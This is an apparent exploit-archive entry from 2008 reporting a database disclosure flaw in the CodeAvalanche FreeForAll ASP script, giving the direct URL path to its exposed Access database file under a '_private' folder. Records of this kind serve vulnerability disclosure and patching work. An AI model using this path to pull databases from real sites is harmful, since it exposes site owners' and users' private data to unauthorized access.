id: 4458
date: 12/15/2008
title: CodeAvalanche FreeForAll (CAFFAPage.mdb) Database Disclosure Vuln
author: Pouya_Server
cves: 

=================================================================
CodeAvalanche FreeForAll (CAFFAPage.mdb) Database Disclosure Vuln
=================================================================


#########################################################
---------------------------------------------------------
Portal Name: CAFFAPAGE
Download : http://www.truecontent.info/codeavalanche/asp-free-for-all-links.php
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/CAFFAPage/_private/CAFFAPage.mdb
 
---------------------------------



#  0day.today [2023-03-24]  #